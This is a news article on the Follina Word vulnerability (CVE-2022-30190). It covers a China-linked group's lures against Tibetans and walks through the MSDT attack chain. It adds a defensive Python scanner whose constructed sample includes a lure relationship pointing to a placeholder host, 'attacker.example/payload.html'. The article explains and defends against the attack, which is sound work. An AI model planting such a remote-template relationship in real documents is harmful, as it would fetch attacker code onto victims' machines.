Threat analysis from security firm Proofpoint has tied exploitation of the recent Microsoft Office vulnerability to Chinese government-backed hackers.
According to details Proofpoint shared on Twitter, a hacking group it tracks as TA413 was using the vulnerability (dubbed “Follina” by researchers) in malicious Word documents purportedly sent from the Central Tibetan Administration, the Tibetan government in exile based in Dharamsala, India. TA413 is an APT, or “advanced persistent threat,” actor believed to be backed by the Chinese government, and it has a history of targeting the Tibetan exile community.
Chinese state-backed hackers have a long record of exploiting software vulnerabilities to target Tibetans. Tibetan political figures have repeatedly been targeted with Chinese spyware delivered through Android browser exploits and malicious links sent via WhatsApp, and Proofpoint's earlier analysis showed that browser extensions, including a malicious Firefox add-on, have also been used to snoop on Tibetan activists.
The Microsoft Word vulnerability first came to the fore on May 27th, when the security research group Nao Sec took to Twitter to discuss a sample submitted to the online malware scanning service VirusTotal. Nao Sec's tweet identified the malicious code as being delivered through a Microsoft Word document that was used to execute commands in PowerShell, the scripting and system administration shell built into Windows.
Researcher Kevin Beaumont's analysis showed how the chain works: a maliciously crafted Word document references an HTML file on a remote server, Word fetches that file when the document is opened, and script in the HTML invokes the Microsoft Support Diagnostic Tool (MSDT) through its ms-msdt: URL protocol handler with parameters that cause it to run attacker-supplied PowerShell. MSDT is a built-in program that normally collects data about crashes and other problems with Microsoft applications, so the code execution happens inside a trusted, signed Windows component rather than through a macro.
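The delivery primitive described above leaves a distinctive trace in the document package itself: a .docx is a zip archive, and the remote HTML is referenced from `word/_rels/document.xml.rels` as an OLE object relationship with `TargetMode="External"` and an http/https target. A legitimately embedded OLE object is an internal package part, so an external remote target is a strong indicator of a Follina-style lure. The following Python script is an added example for this article (it is not Proofpoint's, Nao Sec's, Kevin Beaumont's or Microsoft's code) that scans a document for that pattern. The two sample documents are constructed in memory and the host name `attacker.example` is a placeholder, not a real indicator.

```python
"""Scan a .docx for an OLE object relationship that points to a remote URL,
the delivery primitive used by Follina lure documents.

Example code added to this article; not code from any vendor or researcher
named in it. Sample documents below are constructed in memory."""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
REMOTE_SCHEMES = {"http", "https"}


def find_remote_ole_relationships(docx_bytes: bytes) -> list:
    """Return (rels_part, rel_id, target) for every OLE object relationship
    whose target lies outside the package at an http/https URL.

    Every *.rels part in the archive is inspected, so a relationship placed in
    a header, footer or footnote part is caught as well as the main document."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # malformed relationship part; nothing to resolve
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") != OLE_REL:
                    continue
                if rel.get("TargetMode", "Internal") != "External":
                    continue  # internal parts (embeddings/oleObject1.bin) are normal
                target = rel.get("Target", "")
                if urlsplit(target).scheme.lower() in REMOTE_SCHEMES:
                    findings.append((name, rel.get("Id"), target))
    return findings


def build_docx(rels_xml: str) -> bytes:
    """Construct a minimal docx-shaped zip holding only the parts the scanner
    reads. Used to produce the constructed samples; not a real document."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0" encoding="UTF-8"?>'
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed sample: the relationship shape seen in Follina lure documents.
# The host name is a placeholder, not a real indicator of compromise.
MALICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId1337" Type="{OLE_REL}" Target="http://attacker.example/payload.html!" TargetMode="External"/>
</Relationships>"""

# Constructed benign sample: an OLE object stored as an internal package part.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{OLE_REL}" Target="embeddings/oleObject1.bin"/>
</Relationships>"""

if __name__ == "__main__":
    for label, rels in (("malicious", MALICIOUS_RELS), ("benign", BENIGN_RELS)):
        hits = find_remote_ole_relationships(build_docx(rels))
        print(label, "->", hits or "no remote OLE relationships")
```

To scan a real file, pass the bytes of the .docx to `find_remote_ole_relationships`. Treat a hit as a reason to detonate the document in a sandbox rather than as proof on its own: the scanner identifies the remote reference, not what the fetched HTML does once Word loads it.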
Microsoft has acknowledged the vulnerability, tracked as CVE-2022-30190, and warned that an attacker who successfully exploits it can install programs; view, change, or delete data; or create new user accounts, all with the privileges of the user who opened the document. Because Office is used worldwide, the potential attack surface is expected to be large: current analysis indicates that Follina affects Office 2013, 2016, 2019, 2021, Office ProPlus, and Office 365. The US Cybersecurity and Infrastructure Security Agency (CISA) has urged system administrators to apply Microsoft's mitigation guidance, which at the time of writing is to disable the MSDT URL protocol handler until a patch is available.